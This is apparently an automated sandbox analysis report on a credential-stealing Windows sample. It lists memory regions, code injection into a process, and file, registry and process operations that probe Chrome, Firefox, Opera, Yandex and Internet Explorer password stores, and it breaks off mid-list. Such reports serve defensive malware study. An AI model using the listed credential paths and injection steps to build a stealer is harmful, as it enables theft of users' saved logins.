| pagefile_0x0000000000270000 | 0x00270000 | 0x00276fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000280000 | 0x00280000 | 0x00281fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0029ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a7fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x0033ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0045afff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x0055ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x0056ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0067ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x00807fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x00990fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x01d9ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x01da0000 | 0x0206efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002070000 | 0x02070000 | 0x0216ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002170000 | 0x02170000 | 0x02270fff | Private Memory | Readable, Writable |
|
|
|
- |
| nss3.dll | 0x02170000 | 0x02321fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002170000 | 0x02170000 | 0x022fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002170000 | 0x02170000 | 0x0224ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000022c0000 | 0x022c0000 | 0x022fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002300000 | 0x02300000 | 0x023fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002400000 | 0x02400000 | 0x024fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002500000 | 0x02500000 | 0x028f2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| freebl3.dll | 0x73980000 | 0x739cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcp100.dll | 0x739d0000 | 0x73a38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcr100.dll | 0x73a40000 | 0x73afdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nss3.dll | 0x73b00000 | 0x73cb4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| freebl3.dll | 0x73e70000 | 0x73ebefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| atl.dll | 0x73e90000 | 0x73ea3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pstorec.dll | 0x73eb0000 | 0x73ebcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| version.dll | 0x73ec0000 | 0x73ec8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x73ed0000 | 0x73f53fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| softokn3.dll | 0x74470000 | 0x74496fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x74710000 | 0x7474afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x74790000 | 0x747a5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nssdbm3.dll | 0x74a40000 | 0x74a56fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| softokn3.dll | 0x74a60000 | 0x74a86fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nssdbm3.dll | 0x74a70000 | 0x74a86fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mozglue.dll | 0x74a90000 | 0x74ab1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wsock32.dll | 0x74ac0000 | 0x74ac6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winmm.dll | 0x74ad0000 | 0x74b01fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| vaultcli.dll | 0x74b10000 | 0x74b1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comdlg32.dll | 0x75210000 | 0x7528afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x75890000 | 0x75894fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x664 | address = 0x400000, size = 372736 |
|
1 | |
| Modify Memory | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x664 | address = 0x7efde008, size = 4 |
|
1 | |
| Modify Memory | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x664 | address = 0x7efdf010, size = 4 |
|
1 | |
| Modify Control Flow | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x664 | os_tid = 0xb60, address = 0x0 |
|
1 |
Host Behavior
File (460)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data | desired_access = GENERIC_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\ProgramData\114F.tmp | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting_lng.ini | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | type = size |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | type = size |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat | type = size |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat | type = size |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\WebCache\WebCacheV24.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\history.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite | type = time |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | type = file_attributes |
|
3 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\logins.json | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Mozilla Firefox\sqlite3.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Mozilla Firefox\mozsqlite3.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Sea Monkey\nss3.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\EVWhitelist\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\EVWhitelist\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\pnacl\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\pnacl\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\WidevineCdm\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Apple Computer\Preferences\keychain.plist | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Opera\Opera\wand.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Opera\Opera7\profile\wand.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Opera Software\Opera Stable\Login Data | type = file_attributes |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | size = 32, size_out = 32 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | size = 8, size_out = 8 |
|
64 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | size = 256, size_out = 256 |
|
22 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | size = 384, size_out = 384 |
|
8 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | size = 32, size_out = 32 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | size = 8, size_out = 8 |
|
81 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | size = 256, size_out = 256 |
|
11 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | size = 384, size_out = 384 |
|
2 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat | size = 32, size_out = 32 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat | size = 8, size_out = 8 |
|
94 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat | size = 256, size_out = 256 |
|
2 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat | size = 32, size_out = 32 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat | size = 8, size_out = 8 |
|
94 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat | size = 256, size_out = 256 |
|
2 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data | size = 100, size_out = 100 |
|
1 | |
| Write | C:\ProgramData\114F.tmp | size = 3 |
|
1 | |
| Write | C:\ProgramData\114F.tmp | size = 1 |
|
8 | |
| Write | C:\ProgramData\114F.tmp | size = 11 |
|
1 | |
| Write | C:\ProgramData\114F.tmp | size = 9 |
|
1 | |
| Write | C:\ProgramData\114F.tmp | size = 8 |
|
1 | |
| Write | C:\ProgramData\114F.tmp | size = 17 |
|
1 | |
| Write | C:\ProgramData\114F.tmp | size = 15 |
|
1 | |
| Write | C:\ProgramData\114F.tmp | size = 14 |
|
1 | |
| Write | C:\ProgramData\114F.tmp | size = 12 |
|
1 | |
| Write | C:\ProgramData\114F.tmp | size = 13 |
|
1 | |
| Write | C:\ProgramData\114F.tmp | size = 2 |
|
1 |
Registry (26)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\bin | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin | value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin | value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin | value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla | - |
|
1 |
Process (59)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get filename | c:\windows\system32\taskhost.exe | file_name = C:\Windows\System32\taskhost.exe, flags = PROCESS_NAME_WIN32 |
|
1 | |
| Get filename | c:\windows\system32\dwm.exe | file_name = C:\Windows\System32\dwm.exe, flags = PROCESS_NAME_WIN32 |
|
1 | |
| Get filename | c:\windows\explorer.exe | file_name = C:\Windows\explorer.exe, flags = PROCESS_NAME_WIN32 |
|
1 | |
| Get filename | c:\program files\microsoft office\root\office16\onenotem.exe | file_name = C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE, flags = PROCESS_NAME_WIN32 |
|
1 | |
| Get filename | c:\windows\system32\taskeng.exe | file_name = C:\Windows\System32\taskeng.exe, flags = PROCESS_NAME_WIN32 |
|
1 | |
| Open | System | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsm.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\audiodg.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\root\office16\onenotem.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\villagescirclelaboratory.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\microsoft office\suffering-draw.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\wright_index_transfers_mystery.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\uninstall information\kinasescoredformatsnb.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\teach-minnesota.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\internet explorer\teacher sectors.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla firefox\th rw.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\gis-mom-belly.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\reference assemblies\madagascar.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\microsoft onedrive\victory nasa daughters.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\flower organizer george.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows defender\scripts animals.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\java\changes_directors_inclusion.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
